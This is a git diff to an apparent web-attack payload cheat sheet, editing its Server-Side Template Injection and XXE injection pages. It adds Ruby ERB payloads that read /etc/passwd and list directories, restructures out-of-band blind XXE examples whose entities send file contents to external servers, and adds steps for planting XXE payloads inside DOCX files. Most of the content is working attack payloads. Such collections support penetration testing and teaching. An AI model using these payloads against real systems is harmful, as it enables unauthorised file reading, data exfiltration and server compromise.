diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 7a43ed5..153b320 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -15,16 +15,22 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ### Basic injection -```python +```ruby <%= 7 * 7 %> ``` ### Retrieve /etc/passwd -```python +```ruby <%= File.open('/etc/passwd').read %> ``` +### List files and directories + +```ruby +<%= Dir.entries('/') %> +``` + ## Java ### Java - Basic injection @@ -228,4 +234,5 @@ $eval('1+1') * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/) -* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) \ No newline at end of file +* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) +* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) \ No newline at end of file diff --git a/XXE injection/README.md b/XXE injection/README.md index a1cb8c3..8079471 100644 --- a/XXE injection/README.md +++ b/XXE injection/README.md @@ -101,9 +101,9 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` -## Blind XXE +## Blind XXE - Out of Band -Blind XXE +### Blind XXE ```xml <?xml version="1.0" encoding="ISO-8859-1"?> @@ -116,7 +116,7 @@ Blind XXE <foo>&callhome;</foo> ``` -XXE OOB Attack (Yunusov, 2013) +### XXE OOB Attack (Yunusov, 2013) ```xml <?xml version="1.0" encoding="utf-8"?> @@ -129,7 +129,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd %all; ``` -XXE OOB with DTD and PHP filter +### XXE OOB with DTD and PHP filter ```xml <?xml version="1.0" ?> @@ -146,15 +146,42 @@ File stored on http://127.0.0.1/dtd.xml <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> ``` -XXE Inside SOAP +### XXE Inside SOAP ```xml <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> ``` +### XXE Inside DOCX file + +Format of an Open XML file (inject the payload in any .xml file): + +- /_rels/.rels +- [Content_Types].xml +- Default Main Document Part + - /word/document.xml + - /ppt/presentation.xml + - /xl/workbook.xml + +Then update the file `zip -u xxe.docx [Content_Types].xml` + +Tool : https://github.com/BuffaloWill/oxml_xxe + +```xml +DOCX/XLSX/PPTX +ODT/ODG/ODP/ODS +SVG +XML +PDF (experimental) +JPG (experimental) +GIF (experimental) +``` + ## Thanks to * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) * [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) * [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) +* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) +* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) \ No newline at end of file